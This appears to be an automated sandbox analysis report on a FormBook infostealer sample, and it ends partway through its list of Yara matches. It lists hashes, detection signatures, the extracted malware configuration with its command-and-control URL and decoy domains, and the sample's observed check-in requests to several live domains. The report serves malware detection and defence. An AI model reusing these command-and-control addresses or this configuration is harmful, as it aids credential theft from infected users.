Windows Analysis Report
fooYgfbxno

Overview

General Information

Sample Name: fooYgfbxno (renamed file extension from none to exe)
Analysis ID: 626604
MD5: ce42fe431b88922ab59b6fd880cadcf6
SHA1: 652914d960da1d37d270db7f6e3b07c9d4b0e3a9
SHA256: 4d8cc87942499042195cec4fdb2fc5869d4bf98a1d827fd30fb74e82cf0fdc0f
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
Source: fooYgfbxno.exe Virustotal: Detection: 31%
Source: fooYgfbxno.exe ReversingLabs: Detection: 43%
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.chambaultfleurs.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT Avira URL Cloud: Label: malware
Source: http://www.lotsimprovements.com/ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ Avira URL Cloud: Label: malware
Source: http://www.xn--hj2bz6fwvan2be1g5tb.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 Avira URL Cloud: Label: malware
Source: http://www.huvao.com/ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ Avira URL Cloud: Label: malware
Source: www.mentalnayaarifmetika.online/ocgr/ Avira URL Cloud: Label: malware
Source: http://www.mentalnayaarifmetika.online/ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ Avira URL Cloud: Label: malware
Source: lotsimprovements.com Virustotal: Detection: 7%
Source: fooYgfbxno.exe Joe Sandbox ML: detected
Source: 2.0.aspnet_compiler.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.aspnet_compiler.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.aspnet_compiler.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.aspnet_compiler.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: fooYgfbxno.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
Source: fooYgfbxno.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: fooYgfbxno.exe
Source: Binary string: THEDEVILISHERE.pdb source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: fooYgfbxno.exe
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_compiler.pdb source: svchost.exe, 0000000C.00000002.530634745.0000000003E37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Network Connect: 104.21.89.61 80
Source: C:\Windows\explorer.exe Network Connect: 185.68.16.179 80
Source: C:\Windows\explorer.exe Network Connect: 213.186.33.5 80
Source: C:\Windows\explorer.exe Domain query: www.lotsimprovements.com
Source: C:\Windows\explorer.exe Network Connect: 209.15.40.102 80
Source: C:\Windows\explorer.exe Domain query: www.chambaultfleurs.com
Source: C:\Windows\explorer.exe Domain query: www.zyaxious.website
Source: C:\Windows\explorer.exe Domain query: www.hofwimmer.com
Source: C:\Windows\explorer.exe Network Connect: 61.14.208.3 80
Source: C:\Windows\explorer.exe Domain query: www.mentalnayaarifmetika.online
Source: C:\Windows\explorer.exe Domain query: www.doxofcolor.com
Source: C:\Windows\explorer.exe Network Connect: 206.189.50.60 80
Source: C:\Windows\explorer.exe Domain query: www.myamazonloan.net
Source: C:\Windows\explorer.exe Domain query: www.huvao.com
Source: C:\Windows\explorer.exe Domain query: www.xn--hj2bz6fwvan2be1g5tb.com
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
Source: Malware configuration extractor URLs: www.mentalnayaarifmetika.online/ocgr/
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: UKRAINE-ASUA
Source: Joe Sandbox View ASN Name: OVHFR
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ HTTP/1.1 Host: www.huvao.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ HTTP/1.1 Host: www.mentalnayaarifmetika.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT HTTP/1.1 Host: www.chambaultfleurs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=yHjxPQMm3JcJX2wgLRnbME7+3RpzNlr7I3qSF8qv7PZk+uQof5Nzr3YLke9JRpMCS0ME HTTP/1.1 Host: www.hofwimmer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ HTTP/1.1 Host: www.lotsimprovements.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 HTTP/1.1 Host: www.xn--hj2bz6fwvan2be1g5tb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 185.68.16.179
Source: Joe Sandbox View IP Address: 213.186.33.5
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Sat, 14 May 2022 13:30:12 GMT Content-Type: text/html Content-Length: 1893 Connection: close ETag: "627ea693-765" x-ray: p988:0.001/wn1005:0.000/
Source: svchost.exe, 0000000C.00000002.530690734.0000000003FB2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://adm.tools/support/
Source: unknown DNS traffic detected: queries for: www.doxofcolor.com
Source: fooYgfbxno.exe, 00000001.00000002.268464852.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: fooYgfbxno.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
